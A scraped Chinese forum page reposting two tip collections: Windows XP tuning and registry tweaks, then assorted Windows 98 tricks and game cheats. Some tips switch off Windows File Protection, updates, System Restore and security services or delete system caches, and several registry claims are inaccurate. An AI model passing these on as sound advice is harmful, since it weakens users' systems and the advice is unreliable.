在 Windows XP 操作系统运行过程中，常常会产生后缀名诸如 tmp、bak、log、old、txt 等的文件，这些文件其实都是可以进行安全删除的，甚至包括 Windows 目录下面的 bmp 文件，如果你不喜欢 Windows XP 中自带的那些墙纸的话。完全可以删除掉这些文件。

在 Windows XP 操作系统 Windows\temp 目录下面的文件，笔者也建议你删除掉，那些都是在安装应用软件的过程中遗留下的多余文件。还有一点，就是在硬盘中的小文件，请尽可能地把它们集中起来，然后用 WinZip 这样的压缩软件合并成一个大文件，从而达到减少磁盘空间浪费的目的。

用 SFC 命令释放更多空间（适用于家用版“HomeEdition”及专业版“Professional”）

    若确认系统不会新加入设备，可以把 \windows\system\dellcache 目录内的文件予以删除或设定大小，以释放空间。

  删除全部文件的命令是 sfc.exe/purgecache（sfc.exe/? 查看命令参数的意义），约 300MB，本操作有危险性，对系统不熟悉者勿用。

1、删除驱动器备份

“\windows\Driver cache\i386”下的 Driver.cab 文件，约 70MB。

2、删除帮助文件

“\Windows\Help”下，约 40MB。

3、删除备用 DLL 文件

“\Windows\System32\Dllcache”，约 200MB。最好有安装光盘或安装文件备份，以备用。

    4、删除不用的输入法

“Windows\Ime”，如日文，韩文，繁体中文输入法。

十一、优化页面文件

现在主流计算机的内存配置已经提升到 128MB，不过对于庞大的 Windows XP 操作系统以及功能越来越强大、占用系统内存资源也越来越多的各种软件来说，128MB 还是远远不能满足要求的，这时候 Windows XP 使用的页面文件 （功能相当于我们常说的虚拟内存）就可以发挥其作用了。它将一部分硬盘空间设置为虚拟内存，从而扩大了计算机的可用“内存”空间来满足程序的运行要求。

由于 Windows XP 是动态分配页面文件，Windows XP 会不停地在硬盘中扩大空间来满足程序运行的要求。这样会导致系统工作效率的降低和系统反应的延迟。所以，就将虚拟内存设置为静态的。微软的建议是页面文件的最小值，应该是当前系统内存容量再加上 12MB（RAM + 12MB），对于一台拥有 128MB 内存的机器和一台 512MB 内存的机器，优化性能的规则肯定不同。对于一台装有 128MB 的机器，页面文件的设置可根据这样一个公式计算：内存空间大小 x 1.75。对于一台装有 256MB 或更多内存的机器，页面文件的设置可根据这样一个公式计算：内存空间大小 x 1.5。这样才能让操作系统在崩溃或死机前将内存中全部的内容复制到硬盘上。将虚拟内存设置在系统盘外。比如你的内存是 256M，你可以设置为 640，操作系统安装在 D 盘，设置内存在 C 盘。

具体做法是：右键单击“我的电脑”->“属性”->“高级”，在“性能”选项中点击“设置”->“高级”，在“虚拟内存”选项中点击“更改”，选择“自定义大小”，更改页面文件大小，将初始大小与最大值改为一致，完成后，点击“设置”即可。

十二、视觉效果

大家知道，在 Windows XP 在菜单效果方面比起 Windows 9x 等兄弟可以说是非常漂亮了，不过对于小内存用户来说，太华丽了，太占内存了，（笔者的 256MB 内存也只能是基本满足需要 ）那么该怎么样修改呢？请跟我来：

1、请点击“开始”->“控制面板”，在“控制面板”的分类视图中选择“性能和维护”->“调整视觉效果”，此时将弹出“性能选项”窗口，在这里选择“调整为最佳性能”可以将菜单的所有动画效果去掉。应该感到速度有明显提高，如果还觉得不够快，请往下看。

2、“我的电脑”->“属性”->“高级”->“性能”->“设置”->“高级”标签，在“处理器计划”选择“程序”，“内存使用”选“程序”，这样系统会给前台程序更多资源，使之运行更快。

十三、设置硬盘工作模式

现在电脑爱好者们所用的硬盘要比过去大得多（因为便宜嘛），动辄 30G、40G 的。大硬盘一般都支持 DMA 工作模式，如果确定你的硬盘支持 DMA 方式，那么你就可以用 DMA 方式代替传统的 PIO 方式，这样可以提高硬盘的传输速度并减少你的 CPU 占用率，以提高你的系统性能。具体做法是：用点击“开始”->“控制面板”->“性能与维护”->“查看电脑基本信息”->“设备管理器”->“IDE ATA/ATAPI 控制器”->“IDE 通道”->“属性”->“高级设置”，在传送模式中选择“DMA”即可。

十四、邮件收发程序 Outlook Express

下面这个小技巧可以减少 OE 出错的机率。 在 Outlook Express 界面，在菜单上打开“工具”->“帐号”，选择你的帐号，再选择“属性”->“高级”，把服务器超时一项把时间拉到最长（五分钟）。

十五、处理操作系统安全日志装满时的情况

1、首先打开事件查看器。单击“开始”->“设置”，然后请你单击“控制面板”，双击“管理工具”，然后再双击“事件查看器”即可。

2、在随后出现的控制台树中，用右键单击“安全日志”，然后单击“属性”。

3、接着在“常规”选项卡上，单击“改写久于 n 天的事件”（默认是 7 天前）或“不改写事件（手动清除日志）”。

4、改变日志文件的大小，默认是 512KB。

5、接下来点击“开始”->“运行”，再输入“RegEdit”命令打开注册表编辑器，找到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 分支，这时用右键点击“CrashOnAuditFail”，选择创建“REG_DWORD”类型，赋值为 1 即可。

6、完成此操作后，需要重新启动你的计算机。

十六、禁用多余的服务级件（适用于专业版“Professional”）

右键“我的电脑”->“管理”->“服务和应用程序”->“服务”，将不需要的服务级件禁用。选中禁用程序，点右键，选“属性”->“停止”，将“启动类型”设置为“手动”或“已禁用”。如关闭常见的服务，“Printer Spooler”（打印服务 ）、“Task Scheduler”（计划任务）、“FAX”（传真服务）、“Messenger”（局域网消息传递）、“Remote Registry”（提供无程用户修改注册表）等等。

注意：有些服务是 Windows XP 必需的，关闭后会造系统崩溃。查看详细说明确认后再禁止。

点击“开始”->“运行”->“gpedit.msc”，打开“组策略”，点“计算机配置”->“管理模版”->“Network”（网络）->“Qos Packet Scheduler”（QoS 数据包高度程序），双击右边的“Limit reservable bandwidth（限制可保留带宽）”，设置为“禁用”。

关闭多余的服务

每次 Windows XP 启动之后，随之也启动了许多服务，有些服务对于很多用户来说是没用的，并且占用了内存，关掉它们是一个很好的选择。下面我们来看一下哪些服务有必要关掉。

点击“开始”->“运行”，输入命令“services.msc”，打开“服务”对话框，（注意：必须以管理员或 Administrators 组成员身份登录才能完成该过程。如果计算机与网络连接，则网络策略设置也可以阻止您完成此步骤）。

“Clipbook Server”（文件夹服务器）：这个服务允许你们网络上的其他用户看到你的文件夹。在这里我要强烈建议你把它改为手动启动，然后再使用其他程序在你的网络上发布信息。

“Messenger”（消息）：在网络上发送和接收信息。如果你关闭了 Alerter，你可以安全地把它改为手动启动。

“Printer Spooler”（打印后台处理程序）：如果你没有配置打印机，建议改为手动启动或干脆关闭它。

“Error Reporting Service”（错误报告）：服务和应用程序在非标准环境下运行时提供错误报告。建议改为手动启动。

“Fast User Switching Compatibility”（快速用户切换兼容性）：建议改为手动启动。

“Automatic Updates”（自动更新）：这个功能前面已经讲过了，在这里可以改为手动启动。

“Net Logon”（网络注册）：处理象注册信息那样的网络安全功能。你可以把它设改为手动启动。

“Network DDE 和 Network DDE DSDM”（动态数据交换）：除非你准备在网上共享你的 Office，否则你应该把它改为手动启动。注：这和在通常的商务设定中使用 Office 不同 （如果你需要 DDE，你就会知道）。

“NT LM Security Support”（NT LM 安全支持提供商）：在网络应用中提供安全保护。建议你把它改为手动启动。

“Remote Desktop Help Session Manager”（远程桌面帮助会话管理器）：建议改为手动启动。

“Remote Registry”（远程注册表）：使远程用户能修改此计算机上的注册表设置。建议改为手动启动。

“Task Scheduler”（任务调度程序）：使用户能在此计算机上配置和制定自动任务的日程，它计划每星期的碎片整理等。 除非你实在太懒了，连在电脑上开一下都不想，建议改为手动启动。

“Uninterruptible Power Supply”（不间断电源）：它管理你的 UPS。如果你没有的话，把它改为手动启动或干脆关闭它。

“Windows Image Acquisition（WIA）”（Windows 图像获取（WIA））：为扫描仪和照相机提供图像捕获，如果你没有这些设备，建议改为手动启动或干脆关闭它。

十七、关闭华医生 Dr.Watson（适用于家用版“HomeEdition”及专业版“Professional”）

在“开始”->“运行”中输入“drwtsn32”命令，或者“开始”->“程序”->“附件”->“系统工具”->“系统信息”->“工具”->“Dr Watson”，调出系统里的华医生 Dr.Watson ，只保留“转储全部线程上下文”选项，否则一旦程序出错，硬盘会读很久，并占用大量空间。如以前有此情况，请查找 user.dmp 文件，删除后可节省几十 MB 空间。

十八、关闭部分功能（适用于家用版“HomeEdition”及专业版“Professional”）

1、关闭系统还原功能

“我的电脑”->“属性”->“系统还原”，选“在所有的驱动器上关闭系统还原”。也可关闭不重要的分区的系统还原。如果考虑系统安全，则不要关闭还原功能。

2、关闭自动更新

“我的电脑”->“属性”->“自动更新”，选择“关闭自动更新，我将手动更新计算机”。

3、关闭远程桌面

“我的电脑”->“属性”->“远程”，“远程桌面”里的“允许用户远程连接到这台计算机”勾去掉。

4、取消休眠功能

“我的电脑”->“电源管理”->“休眠”，将“启用休眠”前的勾去掉，约 200MB。

十九、MsConfig

大多数朋友都应该熟识 MsConfig 了，这是一个系统内置的Windows设置工具。点击开始菜单，选择“运行”，然后在录入框中敲入“msconfig”回车。我们要动手脚的是“Startup（启动）”选项卡，点击它。这个选项卡中显示了 Windows 启动时运行的所有程序。这里没有一个程序对 Windows 来说是生死悠关的，所以放心大胆地把不要的去掉。把部分勾勾去掉之后，Windows 启动会快些，同时空闲的系统资源也会多出一些。

二十、其它启动优化

完前面的优化，让我们进一步深入其它启动项。再次点击“开始”->“运行”，在录入框中敲入“services.msc”，回车后弹出窗口：这是 Windows 启动过程的更详细列表，凡是在名字右边标着“Automatic（自动）”的项目都是 Windows 启动时运行的软件。鼠标单击选中其中一条，就会显示出一些文字，说明它有什么作用。中果决定不需要某种服务，只要右键点击它，把属性中的“Automatic（自动）”改为“Manual（手动）”就得了。

二十一、GPEDIT 和 Autoplay

Windows XP 自带了一个非常好用的优化文件，它就是 gpedit.msc。“开始”->“运行”，敲入“gpedit.msc”并回车。这是一个非常有效的编辑工具，可以非常方便地修改一些常见的设置。譬如，你不喜欢CD自动播放的话，用这个工具修改再简便不过了，运行 gpedit.msc 之后，依次点击“Computer Configuration”（计算机设置）->“Administrative Templates”（管理模板）->“System”（系统），这里可以看到一个“Turn off Autoplay（关闭自动运行）”值，右键点击它选择“属性”这里还有很多其它的设置，自己慢慢玩，看有什么值得优化的吧。

二十二、寻找“添加/删除”菜单中隐藏了的选项

    不喜欢 MSN Messenger 吗，或是想把 Windows Media Player 媒体播放器给删掉？可惜打开控制面板中的“添加/删除程序”，Windows XP 自带的程序都不在里面。其实很容易找到，只需用记事本打开 Windows\inf\sysoc.inf 文件，找到类似下面这一段：

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

这是当前所有已安装部件列表，继续前面 MSN Messenger 的例子，这个程序条目名是“msmsgs”，在倒数第三行。可以看到“hide”字样，就是这个参数在控制 Windows“添加/删除程序”中不显示这一项。只需把“hide”删掉就得了，如下：

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

改为：

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

现在重新启动计算机，就可以在“添加/删除程序”列表里看到 MSN Messenger 了。如果想要在添加/删除程序里看到所有的已安装组件，只需用记事本打开 sysoc.inf 文件，用记事本的查找/替换功能把所有“,hide”替换为“,”就行了。

二十三、关闭 Windows 的文件保护

警告：这样修改之后可以直接删除 Windows 的关键文件。

默认状态下系统禁止用户删除系统和程序文件，经过修改注册表可以彻底解除这个限制。打开注册表找到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon 中的 SFCDisable，把它的值改为 0xFFFFFF9D。

如果要用文件保护，重新把它值改为 0 就行了。

二十四、内存性能优化

    Windows XP 中有几个选项可以优化内存性能，它们全都在注册表下面位置：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

禁用内存页面调度（Paging Executive）

在正常情况下，Windows XP 会把内存中的片断写入硬盘，我们可以阻止它这样做，让数据保留在内存中，从而提升系统性能。要注意的是，拥有很多内存的用户（256M 以上）才好使用这个设置。这个设置的名字正如它的功能一样，叫“DisablePagingExecutive”。把它的值从 0 改为 1 就可以禁止内存页面调度了。

提升系统缓存

把 LargeSystemCache 键值从 0 改为 1，Windows XP 就会把除了 4M 之外的系统内存全部分配到文件系统缓存中，这意味着 Windows XP 的内核能够在内存中运行，大大提高系统速度。剩下的4M内存是用来做磁盘缓存的，在一定条件下需要的时候，Windows XP 还会分配更多一些。一般来说，这项优化会使系统性能得到相当的提升，但也有可能会使某些应用程序性能降低。正如前面所说的，必须有 256M 以上的内存，才好激活 LargeSystemCache，否则不要动它。

输入/输出性能

这个优化只对 server 用户才有实在意义 -- 它能够提升系统进行大容量文件传输时的性能。在默认情况下，这个键值在注册表中是不存在的，必须自己建一个 DWORD（双字节值）键值，命名为 IOPageLockLimit。多数人在使用这项优化时都发现 8 到 16M 字节之间性能最好，具体设什么值，可以设进去试试看哪个值可以获得最佳性能。记住这个值是用字节来计算的，因此，譬如你要分配 12M 的话，就是 12 * 1024 * 1024，也就是 12582912。跟前面的内存优化一样，只有当你的内存大于 256M 的时候才好更改这里的值。

二十五、加速共享查看

这是一项很棒的优化，在找到这项优化之前，我经常在漫长地等待窗口显示其它机子上的共享目录中敲破头皮。通常情况下，当 Windows XP 连接到其它计算机时，会检查对方机子上所有预定的任务 -- 这真是多余，而且还会让你等上30秒钟，实在太糟糕了。所幸的是，很容易就可以把这个过程给禁掉。首先，在注册表中找到 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace。在这里面，应该有个 {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 键。只需把它删掉，重新启动计算机后，Windows 就不再检查预定任务了，速度明显提高！

二十六、手动指定进程次序

    同时按下 Control + Alt + Delete 三个键，然后点击“Processes（进程）”选项卡，可以看到一个对话框，在这里可以看到目前正在运行的所有进程。如果要为一个程序分配更多的进程时间，如 3D Studio Max，只需右键点击这个进程，再把鼠标指针向下移动到“Set Priority（设置优先级）”，然后选择你想要这个程序处在哪个优先级。当我接收 email 时，我会把 3DMAX 设为“标准”，但当我离开计算机的时候，我会把它的优先急提升为最高的“实时”，这样可以计算机更专注更快速地处理 3D 动作。

二十七、为 IRQ 中断请求排优先次序

这是本优化指南的最后一项优化，也是一项非常有效的优化。计算机的每一个主要部件都设了个 IRQ 中断号。这里就是要通过修改每个 IRQ 请求的优先次序达到优化目的。这里主要的优化对象是系统/CMOS 实时钟，它通过主板来提升性能。首先，要确定你想要哪个组件获得更高的性能，然后找到这个硬件正在使用的IRQ中断号。怎么找呢？打开控制面板里的系统属性（也可以按键盘上的 Windows + Break 热键组合打开它）。选中“硬件”选项卡，然后点击“设备管理器”按钮。

右键点击要查 IRQ 号的组件，选择“属性”，然后点击“资源”选项卡。

这里可看到设备正在使用的 IRQ 中断号（如果没有IRQ中断号，选择另一个设备）。把中断号记下来，然后运行注册表编辑器 regedit，找到注册表中的 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\PriorityControl 位置。我们要在这里建立一个名为 IRQ#Priority（其中“#”是具体的 IRQ 中断号）的 DWORD 双字节值，然后把它的值设为 1。譬如说，我的系统 CMOS 实时钟的 IRQ 中断号是 8，我要建立的键名就是 IRQ8Priority。

重新启动计算机之后，就会发现刚优化过的组件性能有所提高。笔者强烈建议用这个方法优化系统 CMOS 实时钟，因为它能改善整块主板的性能。当然也可以把多个 IRQ 中断号优先级提高，但这样做的效果没那么好，而且有可能造成系统不稳定。要把这个优化设置撤消的话，只要把刚才建立的注册表键值删掉就 OK 了。

二十八、共享文档

默认情况下，在 Windows XP 中打开我的电脑，会看到在硬盘图标上方有一些文件夹。这些就是“共享文件夹”（看上图粉红色区域），这里有每一个用来户共享文件所用的文件夹。个人认为，这些文件夹特别烦人，毫无必要。我们可以让这些文件夹在我的电脑中消失，原理很简单，只要打开注册表找到如下位置：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders，把 {59031a47-3f72-44a7-89c5-5595fe6b30ee} 键值删掉，下次打开我的电脑，这些烦人的文件夹就不复存在了。

二十九、快速关机

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WaitToKillServiceTimeout 键值改为 4000。另外，把“控制面版”->“管理工具”->“服务”中的 NVidia Driver Help 服务设为手动，也可以加快 Windows 关闭时间。

三十、Windows XP Prefetcher

Windows XP 自带了一个名为 Prefetcher 的服务，这个服务管理着 Windows 启动时的程序初始，其中指定的程序可以在以后使用中快速载入。Prefetcher 在默认情况下就是打开的，不过它的性能还可以进一步提升。打开注册表编辑器，在注册表中找到：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters，其中有一个键值名为 EnablePrefetcher，多数情况下它的值是 3。推荐设置值是 5 -- 在我的机子上，设为 5 的时候工作状态最佳。可以随便试试不同的数值，直到找到最适合自己机子的值为止。

三十一、压缩文件夹

    这是一个相当好的优化， Windows XP 内置了对 .ZIP 文件的支持，我们可以把 zip 文件当成文件夹浏览。不过，系统要使用部分资源来实现这一功能，因此禁用这一功能可以提升系统性能。实现方法非常简单，只需取消 zipfldr.dll 的注册就可以了，点击“开始”->“运行”，敲入：regsvr32 /u zipfldr.dll。

三十二、不加载 DLL 文件

浏览器在使用之后往往会有部分 DLL 文件在内存中缓存好长一段时间，相当大一部分内存会被不用的 DLL 文件点用。为了防止这种事情发生，找到注册表如下位置：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer，接下来建立一个名为 AlwaysUnloadDLL，值为 1 的双字节值。

如果想要去除这项优化，只需把该键值设为 0（也可以干脆把键删掉）。注意：该项优化要在 Windows 重新启动后才生效。

三十三、解决任务栏假死（权威的消除 QQ、IE 等引起任务栏假死）

“控制面板”->“区域和语言选项”->“语言”->“详细信息”，在弹出的“设置窗口”中选择“首选项”的“语言栏”，关闭“在桌面上显示语言栏”，在第三项“在通知区域显示其他语言栏图标”复选框上打上勾。如果不需要手写识别、语音识别的话，也可以再勾选最后一项“关闭高级文字服务”。

三十四、某些软件的兼容性（适用于家用版“HomeEdition”及专业版“Professional”）

对于 QQ 假死，以及其它某些程序在 Windows XP 下不能正常运行的现象，可以找到该程序的执行文件，点右键，在弹出的对话框中选择“兼容性”标签，在“兼容模式”下选择相应需要的运行环境。

三十五、去掉“更新”选项

对于大多数的用户来说，Windows XP 的 Windows Update 功能似乎作用不大，我们可以去掉它，操作步骤如下：打开注册表编辑器，找到 HKEY_CURRENT_USER\Software \Microsoft\Windows\CurrentVersion\Policies\Explorer 子键分支，选择“编辑”菜单下的“新建”命令，新建一个类型为 REG_DWORD 的值，名称为 NoCommonGroups，双击新建的 NoCommonGroups 子键，在“编辑字符串”文本框中输入键值“1”，然后单击“确定”按钮并重新启动系统即可。

三十六、其它优化设置（适用于家用版“HomeEdition”及专业版“Professional”）

1、安装程序至其他盘（不要安装在系统盘下）；

2、将“我的文档”文件夹都转到其他分区：

在桌面的“我的文档”图标上是右击鼠标，选择“属性”->“移动”。

3、将 IE 临时文件夹都转到其他分区：

打开 IE 浏览器，选择“工具”->“Internet 选项”->“常规”->“设置”，在弹出的设置对话框中设置；

4、桌面上点鼠标右键，选“属性”->“主题”，改为“Windows 经典”。

5、在任务栏中点击鼠标右键，选择“属性”->“任务栏”标签中去掉“分组相似任务栏按钮”前的勾；“开始菜单”标签中选择“经典开始菜单”。

三十七、修改 Windows XP 的登录背景图案

面对长久不变的单调的登录图案，你可能日久生厌，我们可以通过注册表来把它换成自己喜欢的图案，步骤如下：打开注册表编辑器，找到 HKEY_USERS\.DEFAULT\Control Panel\Desktop 子键分支，双击 wallpaper，键入你选择好的图片的路径，如：c:\Documents and Settings\My Documents\My Pictures\mypic.bmp，点击“确定”，然后找到 Tilewallpaper，双击它输入键值“1”，重新启动系统即可看到效果。

三十八、修改登录时的背景色

如果你还想修改登录时的背景颜色，可以按以下步骤操作：打开注册表编辑器，找到 HKEY_USERS\.DEFAULT\Control Panel\Colors 子键分支，双击子键分支下的 Background 键值名，出现“编辑字符串”对话框，在“数值数据”文本框中输入代表颜色的键值（比如黑色的 RGB 值为 000，白色的 RGB 值为 255 255 255，系统默认值是 58 110 165），点击“确定”按钮，重新启动系统即可。

三十九、设置启动信息或增加警告信息

如果在启动 Windows XP 时，希望显示一些自己定义的个性化信息，可以按以下步骤来操作：打开注册表编辑器，找到 HKEY_LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 子键分支，双击在它下面的 LegalNoticeCaption 健值名称，打开“编辑字符串”窗口，在“数值数据”文本框中输入信息对话框的标题，比如“你好，欢迎使用本机器”，然后双击 LegalNoticeText，在随后出现的“编辑字符串”窗口中输入想要显示的警告信息，比如“请不要随意修改本级的设置，谢谢！”，单击“确定”按钮，重新启动即可看到修改后的效果了。

四十、每次启动时保持桌面设置不变

我们可以通过修改注册表来保护我们的桌面设置，无论做了什么样的修改，只要重新启动之后桌面就会恢复原样。打开注册表编辑器，找到 HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer 子键分支，在它的下面找到 NoSaveSettings，其类型为 REG_SZ，将其键值改为“0”，或者直接删除该键值项，重新启动系统使设置生效。

四十一、任意定制按钮颜色

尽管 Windows XP 本身带有多种窗口显示方案，但用户想定义某一个部位的颜色，比如把按钮的颜色由黑色改为蓝色或红色，这时就需要修改注册表了，步骤如下：打开注册表编辑器，找到 HKEY_CURRENT_USER\Control Panel\Colors 子键分支，双击在它下面的 Bottontext，在打开的对话框中将其键值改为你想要颜色的值，比如红色 255 0 0，单击“确定”按钮，并重新启动系统即可看到效果了，此时按钮上的文字颜色将变成红色，此外你还可以修改按钮的宽度和高度及背景等参数。

UFO Bulletin Board ====> 不明飞行物
上一贴 | 下一贴
快速回复 主题：Windows XP 设置（转贴）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


[转帖] 一些電腦小技巧 - 经 典 论 坛

计算机技术
[转帖] 一些電腦小技巧

上一贴 | 下一贴
发表人 主题: [转帖] 一些電腦小技巧
erik168

高级用户
积分：223
发帖：64
来自：海南-闪吧
注册：2002-02-10
 发表于 2002-02-10 09:14:26 按此观看erik168的个人资料 按此发邮件给erik168 访问erik168的主页 erik168 的 oicq 是8264961,查看 8264961 的资料 收藏该主题供以后查看 发送悄悄话给erik168 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看erik168的IP
<破解右鍵封鎖>
(1). 有些網站是不可以按右制的，現在我教你破解它吧！
(2). 在那個網頁按右制
(3). 出現了alert後不要按確定，在其他的地方再按右制不放
(4). 不要放開右制，只要按Enter來確定那個alert
(5). 按了Enter確定後才放開右制，看看有什麼事
(6). 想試的話現在試一試吧！

<新接龍你玩晒>
(1). 首先開始一局牌局
(2). 同時按下鍵盤 Ctrl+Shift+F10 會出現一個視窗，並按下視窗中的『異常終止』鈕
(3). 只要在底下任何一張牌上按滑鼠左鍵兩下，牌局即可結束，你便贏了

<傷心小棧看到電腦的牌底>
(1). 按<開始>鍵 -> 尋找-> 檔案或資料夾，尋找登錄編輯器『Regedit』找到了之後，直接在檔案上按滑鼠左鍵二下，開啟登錄編輯器
(2). 依序開啟資料夾，『HKEY_CURRENT_USER』-> 『Software』-> 『Microsoft』-> 『Windows』-> 『CurrentVersion』-> 『Applets』-> 最後開啟『Hearts』這個資料夾
(3). 開啟登錄編輯器功能表中的『編輯』->『新增』->『字串值』後將字串值名稱命名為『zb』
(4). 再開啟登錄編輯器功能表中的『編輯』->『修改』，會出現『編輯字串』的視窗，將『數值資料』設定為『42』後，按下確定按鈕並離開登錄編輯器
(5). 進入傷心小棧後，同時按下『Ctrl』+『Shift』+『Alt』三鍵後再按下『F12』，這時候你就可以看到所有對家的牌底了

<『踩地雷』的時間暫停>
(1). 開啟踩地雷後，先在任何一格上面按下滑鼠左鍵，開始遊戲
(2). 接著同時按下滑鼠的左、右鍵不放，再按下鍵盤左上方的『Esc』鍵
(3). 這時踩地雷右上方的時間就停住不動了

<控制台在開始列內>
(1). 用滑鼠右鍵按<開始> -> 選<檔案總管>
(2). 右邊視窗按滑鼠右鍵 -> <新增> -> 選<資料夾>
(3). 鍵入 ControlPanel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
(4). 按<Enter>

<把資源回收筒都放在開始列內>
(1). 重覆以上(1) (2)
(2). 鍵入 RecycleBin.{645FF040-5081-101B-9F08-00AA002F954E}
(3). 按<Enter>
(4). 如想刪除的話 , 可重覆 (1) 動作 , 刪除

<將資源回收筒改名>
(1). 按<開始>鍵 -> 按<執行> -> 鍵入 regedit
(2). 按<HKEY_CLASSES_ROOT> -> 按<CLSID> -> 尋抓並按<645FF04..........>字頭(得一個)
(3). 將右邊的<預設>用滑鼠按右鍵 -> 選<修改> -> 在<數值資料>鍵入你想要的名稱

<關機有捷徑>
(1). 在桌面空白位置按滑鼠右鍵 -> <新增> -> 選<捷徑>
(2). 在<指令行>鍵入 rundll.exe user.exe,exitwindows
(3). 在<選擇捷徑的名稱>鍵入<關閉Window>或你想要的名稱 -> 按<完成>

<重新啟動有捷徑>
(1). 重覆以上 (1)
(2). 在<指令行>鍵入 rundll.exe user.exe,exitwindowsexec
(3). 在<選擇捷徑的名稱>鍵入<重新啟動Restart>或你想要的名稱 -> 按<完成>

<寄郵件有捷徑>
(1). 先去<Program Files> -> <Outlook Express> -> 用滑鼠右鍵按<Msimn> -> 選<建立捷徑>
(2). 將<捷徑Msimn>搬到桌面 , 用滑鼠右鍵按<捷徑Msimn> -> 選<內容>
(3). 在<目標>鍵入 /mailurl:* (鍵入前格一空格) -> 按<確定>
(4). 完成 , 以後可按<捷徑Msimn>來寄郵件. 不用次次開Outlook Express 那麼麻煩 >_<

<改變資料夾背景>
(1). 開啟<檔案總管> -> 按<檢視> -> 選<自訂這個資料夾>
(2). 選<選擇背景圖片> -> 按<下一步>
(3). 選擇你喜歡的背景吧! -> 按<下一步> -> 按<完成>

<Windows 98 開始列單變雙>
註：這是將開始列內的程式集分開成兩行排列
(1). 按<開始> -> 按<執行> -> 鍵入 regedit
(2). 按<HKEY_LOCAL_MACHINE> -> <Software> -> <Microsoft> -> <Windows> -> <Current Version> ->
<explorer> -> <Advanced>
(3). 在右邊視窗用滑鼠按右鍵 , 選<新增> -> 按<字串值> 鍵入 StartMenuScrollPrograms
(4). 用滑鼠右鍵按<StartMenuScrollPrograms> -> 選<修改>在<數值資料>改為 False -> 按<確定> <隱藏控制台圖示>
(1). 先到<C> -> <WINDOWS> -> 尋抓並雙按<control.ini>檔案
(2). 在 [ don't load] 文字下輸入:
password.cpl=no (密碼)
joystick.cpl=no (遊戲控制器)
midimap.drv=no (區域設置)
sticpl.cpl=no (數碼相機)
powerefg.cpl=no (電源管理)
netcpl.cpl=no (網絡)
inetcpl.cpl=no (Internet選項,使用者)
modem.cpl=no (數據機)
main.cpl=no (印表機,鍵盤,輸入法,字型,滑鼠)
mmsys.cpl=no (多媒體,聲音)
desk.cpl=no (顯示器)
appwiz.cpl=no (新增/移除程式)
access.cpl=no (協助工具選項)
telephon.cpl=no (電話語音)
themes.cpl=no (佈景主題)
timedate.cpl=no (日期/時間)
sysdm.cpl=no (系統,加入新的硬體)
(3). 之後要儲存檔案 , 如想還原圖示請自行刪除
(4). 或可使用 Tweak UI 軟件來隱藏圖示

<Windows 98 有時光倒流>
(1). 按<開始> -> 按<關機> -> 選<將電腦重新啟動在MS-DOS模式>
(2). 鍵入C:\WINDOWS>Scanreg/restore 按<Enter>
(3). 進入左 Microsoft Registry Checker
(4). 那裡有Windows最近五日的記錄 , 選定那一天後按<Restore>
(5). 時光倒流了!強呀!

<檔案總官跑馬燈>
(1). 先將畫面標成<顯示成Web畫面>
(2). 按<檢視> -> <資料夾選項> -> 在檢視選單選<顯示所有檔案>
(3). 按<檢視> -> <自訂這個資料夾> -> 選<建立或編輯HTML文件> -> 按<下一步>
(4). 它會有一個記事本視窗出現,先關閉它 -> 按<下一步> -> 按<完成>
(5). 開啟<記事本> -> <檔案> -> <開啟舊檔> -> 選C -> 再選<Folder.htt>(一定要在 C 的目錄下那個喔)
(6). 按<搜尋> -> <尋找> -> 鍵入 HERE'S A GOOD PLACE TO ADD A FEW LINKS OF YOUR OWN
(7). 找倒後在這一句下鍵入 <P><marquee bgcolor="#12B9FF">輸入你喜歡的文字</marquee></p>
(8). 當然要存檔喇 !

<Windows 98 有隱藏動畫>
(1). 首先去 C ->WINDOWS->Application Data->Microsoft->WELCOME.
(2). 揀選 <weldata> 檔案
(3). 按滑鼠右鍵,選 <建立捷徑>
(4). 將<捷徑-Weldata>用滑鼠按右鍵 -> 內容
